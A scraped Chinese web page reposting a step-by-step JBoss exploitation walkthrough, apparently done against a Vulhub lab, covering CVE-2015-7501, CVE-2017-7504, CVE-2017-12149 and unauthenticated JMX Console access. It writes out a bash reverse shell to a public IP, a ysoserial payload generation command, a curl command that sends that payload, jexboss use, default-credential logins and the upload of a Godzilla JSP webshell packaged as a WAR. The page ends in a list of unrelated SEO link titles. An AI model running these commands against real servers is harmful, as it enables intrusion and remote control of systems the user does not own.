当前位置: 首页 > wzjs >正文

网站功能有哪些网站开发学什么语言好

网站功能有哪些,网站开发学什么语言好,个人网站费用,智能模板网站建设收费CVE-2015-7501 Jboss JMXInvokerServlet 反序列化漏洞,这是经典的JBoss反序列化漏洞,JBoss在/invoker/JMXInvokerServlet请求中读取了⽤户传⼊的对象,然后我们利用Apache Commons Collections中的 Gadget 执⾏任意代码 访问地址 http://39…

CVE-2015-7501

Jboss JMXInvokerServlet 反序列化漏洞,这是典的JBoss反序列化漏洞JBoss/invoker/JMXInvokerServlet读取户传⼊的对我们利用Apache Commons Collections   Gadget 任意代

 访问地址 http://39.105.61.160:8080/invoker/JMXInvokerServlet1.返回如下,说明接⼝开放,此接⼝存在反序列化漏洞

 下载 ysoserial ⼯具进⾏漏洞利⽤

https://github.com/frohoff/ysoserial

 将反弹shell进⾏base64编码

bash -i >& /dev/tcp/39.105.61.160/6666 0>&1

 监听6666端口

使用cmd

 java -jar "C:\Users\23215.呵呵\Documents\WeChat Files\wxid_1jxr0075qqd422\FileStorage\File\2025-03\ysoserial-all.jar" CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8zOS4xMDUuNjEuMTYwLzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}">exp.ser

执行后在当前目录会生成一个exp.ser

再使用curl http://39.105.61.160:8080/invoker/JMXInvokerServlet --data-binary @exp.ser,那么就可以成功监听到端口

CVE-2017-7504

JBossMQ JMS 序列化漏洞,JBoss AS 4.x之前版本中JbossMQJMS over HTTP Invocation LayerHTTPServerILServlet.java序列化漏洞者可借助特制的序列化数据漏洞执任意代码执

访问漏洞地址,出现此页面说明存在漏洞

http://39.105.61.160:8080/jbossmq-httpil/HTTPServerILServlet

 在kali中使用jexboss工具

python3 jexboss.py -u http://39.105.61.160:8080

 

拿到shell 

​​​​​​​CVE-2017-12149

JBoss 5.x/6.x序列化漏洞,该漏洞为 Java序列化错在于 Jboss  HttpInvoker 件中的 ReadOnlyAccessFilter滤器中过滤器在没有进任何查的情况尝试将⾃客数据流进⾏反序列化⽽导了漏洞

使用jboss反序列化_CVE-2017-12149.jar

 ​​​​​​​Administration Console

Administration Console⻚⾯存在弱`admin:admin`陆后台war , getshell

 访问漏洞⻚⾯,出现404则存在漏洞

http://39.105.61.160:8080/invoker/readonly

点击Administration console

 使用弱口令登录,admin;vulhub

 点击Web Application (WAR)->Add New Web Application (WAR)

使用哥斯拉生成jsp木马,写入shell.jsp,压缩为shell.zip,将名字改为shell.war 

上传后通过http://39.105.61.160:8080/shell/shell.jsp访问,可使用哥斯拉连接就可以了

​​​​​​​低版本JMX  Console未授

JMX Console未授权访问Getshell,此漏洞JBoss/jmx-console/HtmlAdaptor路径对开放有任何身份致攻以进⼊到   jmx并在中执任何

点击JMX Console

使用弱口令登录,admin;admin

 

 登陆后找到jboss.deployment

 点击flavor=URL后找到void addURL(),第一个

将shell.war放到服务器上

 http://39.105.61.160/shell.war

点击Invoke, 出现下图代表成功

使用http://39.105.61.160/shell/shell.jsp就能访问到,之后使用哥斯拉连接 

版本JMX  Console未授

JMX Console访接点JBoss  JMX Console 接进JMX Console⻚⾯, 通过部war, getshell

点击JMX Console,账号admin;vulhub

 登陆后点击jboss.system->service=MainDeployer

 找到deloy部署http://39.105.61.160/shell.war,点击Invoke

使用http://39.105.61.160/shell/shell.jsp就能访问到,之后使用哥斯拉连接 

http://www.dtcms.com/wzjs/810781.html

相关文章:

  • 东莞市网站建设服务机构江苏省建设工程交易中心网站
  • 提供网站建设的功能开发手机app用什么语言
  • 余姚 做网站wordpress搜索 文章内容
  • 宁波企业网站建设字体设计软件免费
  • 电子商务专业毕业后干什么重庆快速排名优化
  • 微网站摇一摇招聘网站建设需求文档
  • 松江新城建设投资有限公司网站网页设计论文大纲
  • 图片做多的网站是哪个杭州设计院排行榜
  • 佛山网站设计怎么做手机网站有用吗
  • 网站 形象入口页社区网站开发进度表
  • 三水网站建设公司品牌形象设计方案
  • 务川县建设局官方网站wordpress777
  • 网站备案主体空壳江苏网站备案
  • 昆山网站建设价格专业模板网站制作哪家好
  • 罗源福州网站建设全球购物官方网站有哪些
  • 长沙麓谷建设发展有限公司网站商城网站开发
  • 手机网站建设一般要多少钱网站模板排名
  • 企业网站icp备案申请项目计划书团队介绍
  • 微官网与网站的区别wordpress微信采集按钮
  • 中国建设银行淮南分行网站西地那非片说明书
  • 让你有做黑客感觉的网站智慧房产信息管理平台
  • 网站搭建南京国外优秀网站模板
  • 内蒙古自治区建设厅官方网站数字营销沙盘
  • 网站管理后台 模板最权威的网站推广设计
  • 垂直网站建设方案hao123浏览器
  • 兴润建设集团有限公司网站什么是网络营销?网络营销与电子商务有什么区别?
  • 公益网站模板seo推广方法
  • 网站建设运行佛山专业网站制作公司
  • 企业网站营销常用的方法家装设计师工作内容
  • 企业网站的cms在网站上做播放视频广告是否违法